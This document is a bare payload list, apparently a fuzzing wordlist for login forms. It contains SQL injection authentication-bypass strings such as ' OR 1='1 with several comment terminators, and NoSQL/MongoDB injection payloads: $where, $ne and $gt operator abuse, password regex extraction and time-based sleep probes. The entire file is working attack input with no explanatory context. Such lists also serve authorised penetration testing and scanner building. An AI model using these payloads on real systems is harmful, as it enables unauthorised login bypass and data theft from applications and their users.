adam' OR 1='1 -- -
adam' OR 0='0 -- -
adam' OR 1='1 #
adam' OR 0='0 #
adam' OR 1='1 ;
adam' OR 0='0 ;
adam' OR 1='1 ;#
adam' OR 0='0 ;#
adam' OR 1='1 /*
adam' OR 0='0 /*
test' OR 1='1 --
test' OR 0='0 --
test' OR 1='1 -- -;
test' OR 0='0 -- -;
test' OR 1='1 -- -
test' OR 0='0 -- -
test' OR 1='1 #
test' OR 0='0 #
test' OR 1='1 ;
test' OR 0='0 ;
test' OR 1='1 ;#
test' OR 0='0 ;#
test' OR 1='1 /*
test' OR 0='0 /*
user OR 1='1 --
user OR 0='0 --
user OR 1='1 -- -;
user OR 0='0 -- -;
user OR 1='1 -- -
user OR 0='0 -- -
user OR 1='1 #
user OR 0='0 #
user OR 1='1 ;
user OR 0='0 ;
user OR 1='1 ;#
user OR 0='0 ;#
user OR 1='1 /*
user OR 0='0 /*
admin OR 1='1 --
admin OR 0='0 --
admin OR 1='1 -- -;
admin OR 0='0 -- -;
admin OR 1='1 -- -
admin OR 0='0 -- -
admin OR 1='1 #
admin OR 0='0 #
admin OR 1='1 ;
admin OR 0='0 ;
admin OR 1='1 ;#
admin OR 0='0 ;#
admin OR 1='1 /*
admin OR 0='0 /*
adam OR 1='1 --
adam OR 0='0 --
adam OR 1='1 -- -;
adam OR 0='0 -- -;
adam OR 1='1 -- -
adam OR 0='0 -- -
adam OR 1='1 #
adam OR 0='0 #
adam OR 1='1 ;
adam OR 0='0 ;
adam OR 1='1 ;#
adam OR 0='0 ;#
adam OR 1='1 /*
adam OR 0='0 /*
test OR 1='1 --
test OR 0='0 --
test OR 1='1 -- -;
test OR 0='0 -- -;
test OR 1='1 -- -
test OR 0='0 -- -
test OR 1='1 #
test OR 0='0 #
test OR 1='1 ;
test OR 0='0 ;
test OR 1='1 ;#
test OR 0='0 ;#
test OR 1='1 /*
test OR 0='0 /*
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
{"$gt": ""}
[$ne]=1
';sleep(5000);
';sleep(5000);'
';sleep(5000);+'
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true
